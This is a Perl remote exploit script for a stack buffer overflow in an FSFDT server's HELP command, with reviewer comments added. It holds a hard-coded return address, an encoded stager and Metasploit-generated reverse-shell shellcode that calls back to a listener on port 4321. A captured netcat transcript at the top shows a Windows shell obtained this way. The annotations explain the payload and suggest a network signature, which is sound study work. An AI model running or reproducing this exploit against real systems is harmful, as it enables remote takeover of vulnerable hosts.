# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
# NOTE(review): the lines above are a captured listener transcript (a
# netcat listener on port 4321 receiving the shell), not part of the
# script itself; the script proper begins at the shebang below.
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
#
# Proof-of-concept for what is presumably a stack-based buffer overflow in
# the FSFDT server's "HELP" command handling (inferred from the return-address
# overwrite with a 'jmp esp' below). The script connects to the target, sends
# one oversized HELP command built from fixed filler, a hard-coded return
# address and two shellcode stages, then closes the socket without reading
# any reply.
#
# Everything is pinned to one exact build: the return address comes from a
# specific KERNEL32.DLL version and the shellcode has its call-back address
# baked in. From a detection standpoint the wire format is very regular --
# "HELP " followed by 200 'A' bytes and then raw binary -- which makes a
# simple network signature for this attack.
#
# NOTE(review): the header says the shell calls back to 10.0.0.100, but the
# metasploit generator line further down records LHOST=10.0.0.2; one of the
# two comments is stale. Confirm before relying on either.
# NOTE(review): no 'use strict' / 'use warnings' in this script.

use IO::Socket;

# Need at least two arguments: $#ARGV is the last index, so < 1 means fewer
# than two. NOTE(review): the usage text appears to have lost its argument
# placeholders (likely stripped as angle brackets during extraction) --
# TODO confirm against the original listing.
if( $#ARGV < 1 ) {
    print "usage: perl ".$0." ";
    exit();
}

my $ip = $ARGV[0];     # target host
my $port = $ARGV[1];   # target TCP port

print "connecting...\n";
# Indirect-object syntax ('new Class (...)') is discouraged in modern Perl;
# IO::Socket::INET->new(...) is the equivalent call.
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => $port,
    Proto => 'tcp',
);
# NOTE(review): IO::Socket::INET also reports the failure reason in $@;
# $! alone may be empty on some failure paths -- confirm.
die "could not create socket: $!\n" unless $sock;

# jmp esp in KERNEL32.DLL 5.0.2195.7006
# Four little-endian bytes that overwrite the saved return address; valid
# only for that exact DLL build (any other build lands elsewhere).
my $jmpesp = "\xB7\x49\xE7\x77";

# encoded 'jmp 0x400' to jump to stage2
# Stage 1: a small encoded stub that runs first (esp points here after the
# 'jmp esp') and transfers control forward into the NOP sled before stage 2.
my $jmpcode = "\xeb\x11\x5e\x31\xc9\xb1\x1e\x80\x6c\x0e\xff\x35\x80\xe9\x01".
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x0e\x16\x0e\x69\x59\x8d".
"\x8d\x8d\x8d\xb5\x1d\x1c\x66\xfe\x9b\xb6\x1e\x30\x34\xb5\x65".
"\x36\x75\x17\x2f\x1d\x36\x3a\x36\x36";

# win32_reverse - EXITFUNC=thread LHOST=10.0.0.2 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com
# bad chars: 0x00 0x0A 0x0D 0x20 0x29
# Stage 2: metasploit-generated reverse shell, encoded so that none of the
# listed bytes (NUL, LF, CR, space, ')') appear -- presumably because the
# server's command parser treats them specially.
my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
"\x2a\x6e\x8f\x83\xeb\xfc\xe2\xf4\xe2\x40\x85\xc2\xf6\xd3\x91\x70".
"\xe1\x4a\xe5\xe3\x3a\x0e\xe5\xca\x22\xa1\x12\x8a\x66\x2b\x81\x04".
"\x51\x32\xe5\xd0\x3e\x2b\x85\xc6\x95\x1e\xe5\x8e\xf0\x1b\xae\x16".
"\xb2\xae\xae\xfb\x19\xeb\xa4\x82\x1f\xe8\x85\x7b\x25\x7e\x4a\xa7".
"\x6b\xcf\xe5\xd0\x3a\x2b\x85\xe9\x95\x26\x25\x04\x41\x36\x6f\x64".
"\x1d\x06\xe5\x06\x72\x0e\x72\xee\xdd\x1b\xb5\xeb\x95\x69\x5e\x04".
"\x5e\x26\xe5\xff\x02\x87\xe5\xcf\x16\x74\x06\x01\x50\x24\x82\xdf".
"\xe1\xfc\x08\xdc\x78\x42\x5d\xbd\x76\x5d\x1d\xbd\x41\x7e\x91\x5f".
"\x76\xe1\x83\x73\x25\x7a\x91\x59\x41\xa3\x8b\xe9\x9f\xc7\x66\x8d".
"\x4b\x40\x6c\x70\xce\x42\xb7\x86\xeb\x87\x39\x70\xc8\x79\x3d\xdc".
"\x4d\x69\x3d\xcc\x4d\xd5\xbe\xe7\x14\x2a\x6e\xeb\x78\x42\x7e\x6e".
"\x78\x79\xe7\x6e\x8b\x42\x82\x76\xb4\x4a\x39\x70\xc8\x40\x7e\xde".
"\x4b\xd5\xbe\xe9\x74\x4e\x08\xe7\x7d\x47\x04\xdf\x47\x03\xa2\x06".
"\xf9\x40\x2a\x06\xfc\x1b\xae\x7c\xb4\xbf\xe7\x72\xe0\x68\x43\x71".
"\x5c\x06\xe3\xf5\x26\x81\xc5\x24\x76\x58\x90\x3c\x08\xd5\x1b\xa7".
"\xe1\xfc\x35\xd8\x4c\x7b\x3f\xde\x74\x2b\x3f\xde\x4b\x7b\x91\x5f".
"\x76\x87\xb7\x8a\xd0\x79\x91\x59\x74\xd5\x91\xb8\xe1\xfa\x06\x68".
"\x67\xec\x17\x70\x6b\x2e\x91\x59\xe1\x5d\x92\x70\xce\x42\x81\x41".
"\xfe\x4a\x3d\x70\xc8\xd5\xbe\x8f";

print "sending payload...\n";
# Payload layout, sent in a single write:
#   "HELP "        - the command the vulnerable handler parses
#   "A" x 200      - filler preceding the return-address overwrite
#   $jmpesp        - return address -> 'jmp esp'
#   "\x90" x 8     - short NOP pad before stage 1
#   $jmpcode       - stage 1: encoded jump forward into the sled
#   "\n"           - ends the command line
#   "\x90" x 400   - NOP sled
#   $shellcode     - stage 2: reverse shell
# The server's reply is never read, so success is only visible on the
# listener side.
print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" . "\x90"x400 . $shellcode;
close($sock);
print "done.\n";